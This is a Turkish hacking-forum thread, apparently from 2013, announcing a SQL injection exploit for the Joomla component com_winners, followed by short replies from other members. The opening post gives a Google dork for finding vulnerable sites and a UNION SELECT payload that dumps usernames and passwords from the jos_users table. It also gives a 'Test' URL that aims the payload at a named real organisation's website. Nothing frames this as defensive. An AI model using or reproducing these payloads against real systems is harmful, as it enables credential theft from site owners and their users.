İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

Joomla com_winners Sql İnjection THT'ye Özel

01-09-2013 19:36
#1
rooter - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Nereden:
uid=0(root)
Mesajlar:
48
Teşekkür (Etti):
0
Teşekkür (Aldı):
11
Konular:
9
Ticaret:
(0) %
###########################
#Explot Title:com_winner
#Google Dorl:inurlption=com_winners
#Author:Rooter & SubWay
#Target:Equator Initiative
#Sql Version:5.0.92-community-log
#Data:1 Eylül 2013 Pazar
###########################


Selamun Aleyküm Açığımız İlk Defa THT'de yayınlanmaktadır Piyasada Yeni Fakat İleride Kullanılacağına Eminim

Exploit:
Kod:
/index.php?option=com_winners&view=winner_detail&id=1/**/AND/**/1=0/**/UNION SELECT/**/1,CONCAT_WS(0x3a,username,0x3a,password),3,NULL,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/jos_users--
Test:
Kod:
http://www.equatorinitiative.org/index.php?option=com_winners&view=winner_detail&id=1/**/AND/**/1=0/**/UNION SELECT/**/1,CONCAT_WS(0x3a,username,0x3a,password),3,NULL,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/jos_users--
Kullanıcı İmzası
Mevzu-u Bahis Vatan İse Gerisi Teferruattır
HacKRooT & SubWay & KaCaMax
Bizleri İzleyeme Devam Edin
Konu rooter tarafından (01-09-2013 20:13 Saat 20:13 ) değiştirilmiştir.

01-09-2013 20:14
#2
SubWay - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2012
Mesajlar:
142
Teşekkür (Etti):
4
Teşekkür (Aldı):
28
Konular:
9
Ticaret:
(0) %
İlgilenen arkadaşlar deniye bilirler
Kullanıcı İmzası
Beni tanımadan konuşanlara kızmıyorum çünkü köpekler tanımadıklarına havlarlar
01-09-2013 20:17
#3
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.700
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Konular:
152
Ticaret:
(0) %
Bugu sen bulduysan eline sağlık kardeşim fakat 2 sayfa site var hiçbirinde işlemiyor exploit.
Kullanıcı İmzası
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
01-09-2013 20:22
#4
rooter - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Nereden:
uid=0(root)
Mesajlar:
48
Teşekkür (Etti):
0
Teşekkür (Aldı):
11
Konular:
9
Ticaret:
(0) %
Ben buldum. Orada belirttim zamanla kurulacaktır araştırdım eminim. Şimdilik dursun bakalım kimse çalmasın diye paylaşımımı yaptım.
Selametle;
Kullanıcı İmzası
Mevzu-u Bahis Vatan İse Gerisi Teferruattır
HacKRooT & SubWay & KaCaMax
Bizleri İzleyeme Devam Edin
06-09-2013 22:14
#5
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.700
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Konular:
152
Ticaret:
(0) %
Tasındı
Kullanıcı İmzası
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
14-09-2013 21:46
#6
Üyelik tarihi:
07/2013
Yaş:
22
Mesajlar:
160
Teşekkür (Etti):
125
Teşekkür (Aldı):
14
Konular:
20
Ticaret:
(0) %
eyvallah kardesim
Kullanıcı İmzası
HACKER
15-09-2013 02:36
#7
Dexterli - ait Kullanıcı Resmi (Avatar)
Tasarımcı
Üyelik tarihi:
05/2013
Nereden:
antalya
Mesajlar:
2.537
Teşekkür (Etti):
1500
Teşekkür (Aldı):
1931
Konular:
271
Ticaret:
(0) %
eline saglık
Kullanıcı İmzası
'hayattan bu kadar kopuk olmama şaşmamak gerek. eğer hislerim olsaydı bu durumda duygulanırdım'
DEXTER
20-09-2013 17:33
#8
cimenli42 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
Konya
Mesajlar:
52
Teşekkür (Etti):
5
Teşekkür (Aldı):
1
Konular:
16
Ticaret:
(0) %
özür dilerim ama index.php ye index atınca exploit yerinede index gelmiş

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı